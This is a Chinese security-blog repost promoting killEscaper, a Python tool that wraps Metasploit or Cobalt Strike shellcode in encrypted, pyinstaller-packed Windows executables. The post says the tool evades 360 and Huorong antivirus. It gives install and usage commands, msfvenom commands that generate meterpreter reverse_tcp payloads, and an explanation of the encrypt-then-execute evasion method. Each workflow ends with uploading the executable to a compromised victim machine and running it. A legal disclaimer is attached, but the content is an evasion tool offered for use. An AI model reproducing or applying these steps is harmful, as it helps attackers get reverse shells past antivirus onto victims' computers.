【免杀工具】killEscaper过360,火绒检测

admin 2023年6月9日19:18:06评论141 views字数 2507阅读8分21秒阅读模式

点击蓝字,关注我们



【免杀工具】killEscaper过360,火绒检测





Github项目:

https://github.com/Anyyy111/killEscaper

声明:本工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。





介绍


    killEscaper 是一个利用shellcode来制作免杀exe的工具,可结合渗透工具生成的shellcode二次转换exe,支持红队常用渗透工具CobaltStrike、metasploit等,测试可以绕过火绒、360等杀软,操作系统位数支持32、64位。


    当前处于测试阶段,任何问题欢迎公众号留言

    工具仅支持Windows 且python版本需为python3.x



安装

项目拉取:

git clone https://github.com/Anyyy111/killEscaper

模块安装:

   脚本调用的模块都是原生库,注意安装 pyinstaller 即可。

 pip install pyinstaller

   并添加 pyinstaller 至系统环境变量。



使用方法

_    _ _ _ _____| | _(_) | | ____|___  ___ __ _ _ __   ___ _ __| |/ / | | |  _| / __|/ __/ _` | '_  / _  '__||   <| | | | |_____  (_| (_| | |_) |  __/ ||_|__|_|_|_____|___/_____,_| .__/ ___|_|                               |_|    @Title: killEscaper_ShellCode免杀生成器    @Author: Anyyy    @Blog: https://www.anyiblog.top/    @env:Windows系统、Python3



usage: python killEscaper.py -a <32/64> -f <ShellCode File> -i <Icon file>

使用说明:

optional arguments: -h, --help show this help message and exit -a ARCH, --arch ARCH shellcode对应的操作系统位数 默认为64 -f FILE, --file FILE 任何包含shellcode的Payload文件 用于读取并生成 -i ICON, --icon ICON exe的Icon图标 -c, --clean 清理output输出文件
  • -f (--file) 必要参数指定任何包含shellcode的Payload文件,用于读取并生成

  • -a (--arch) 可选参数,shellcode对应的操作系统位数 默认为64位

  • -i (--icon) 可选参数,生成的exe的Icon图标,程序默认图标为exeLogo.ico

  • -c (--clean) 清理output输出文件,程序每次运行会在output生成exe文件,使用该参数可以直接清理


使用案例

根据shellcode生成64位的exe执行文件

python killescaper -f payload64.c #根据shellcode生成64位的exe执行文件


根据shellcode生成32位的exe执行文件:

python killescaper -a 32 -f payload32.c #根据shellcode生成32位的exe执行文件


自定义图标:

python killescaper -a 64 -f payload64.c -i logo.ico #生成一个以logo.ico为图标的exe执行文件


清理输出文件夹:

python killescaper --clean #清理output/所有文件


metasploit生成免杀

只讲生成免杀的步骤,执行及如何返回监听请查看 效果演示 的视频。

1.msfvenom生成shellcode

x64:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=PORT -f python -a x64 > shellcode.txt


x32:

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=PORT -f python -a x86 > shellcode.txt





【免杀工具】killEscaper过360,火绒检测



2.将shellcode.txt复制到本地

3.运行脚本生成exe

python killEscaper.py -a 64 -f shellcode.txt




【免杀工具】killEscaper过360,火绒检测



4.运行成功后会复制到剪贴板,粘贴或在/output/文件夹找到可执行文件




【免杀工具】killEscaper过360,火绒检测



5.上传到肉鸡运行


CobaltStrike生成免杀

只讲生成免杀的步骤,执行及如何返回监听请查看 效果演示 的视频。


1.cs生成shellcode

x64




【免杀工具】killEscaper过360,火绒检测





【免杀工具】killEscaper过360,火绒检测


x32




【免杀工具】killEscaper过360,火绒检测





【免杀工具】killEscaper过360,火绒检测



output输出C、python都行。

2.点击Generate到本地payload64.c

3.运行脚本生成exe

python killEscaper.py -a 64 -f payload64.c




【免杀工具】killEscaper过360,火绒检测



4.运行成功后会复制到剪贴板,粘贴或在/output/文件夹找到可执行文件




【免杀工具】killEscaper过360,火绒检测


5.上传到肉鸡运行


效果演示





【免杀工具】killEscaper过360,火绒检测




原理


    程序会将shellcode进行加密,会生成cipher密文和key密钥,密文和密钥每次生成都不同。


    模板中定义了解密模块,需要对应的密文密钥才能解密,再将解密后的Payload执行,即执行恶意shellcode返回至监听的cs或msf。


    模板写好后再写到python文件中,利用pyinstaller打包成exe,算法绕过了杀软的检测 同时执行shellcode,便成功实现了免杀执行。


    算法部分参考免杀工具 BypassAV 的算法并进行了优化。




【免杀工具】killEscaper过360,火绒检测

关注公众号,回复 killEscaper 获取下载链接


【免杀工具】killEscaper过360,火绒检测


【免杀工具】killEscaper过360,火绒检测


【免杀工具】killEscaper过360,火绒检测

往期推荐

【免杀工具】killEscaper过360,火绒检测
【免杀工具】killEscaper过360,火绒检测

从swagger api泄露到进入后台
【免杀工具】killEscaper过360,火绒检测

看我如何利用熊猫头插件拿下局长..
【免杀工具】killEscaper过360,火绒检测

记一次度某满SRC挖掘之曲线救国
免责声明

由于传播、利用本公众号NGC660安全实验室所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号NGC600安全实验室及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

点点分享
【免杀工具】killEscaper过360,火绒检测
点点赞
【免杀工具】killEscaper过360,火绒检测
点点在看
【免杀工具】killEscaper过360,火绒检测



原文始发于微信公众号(NGC660安全实验室):【免杀工具】killEscaper过360,火绒检测

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月9日19:18:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀工具】killEscaper过360,火绒检测http://cn-sec.com/archives/1790583.html

发表评论

匿名网友 填写信息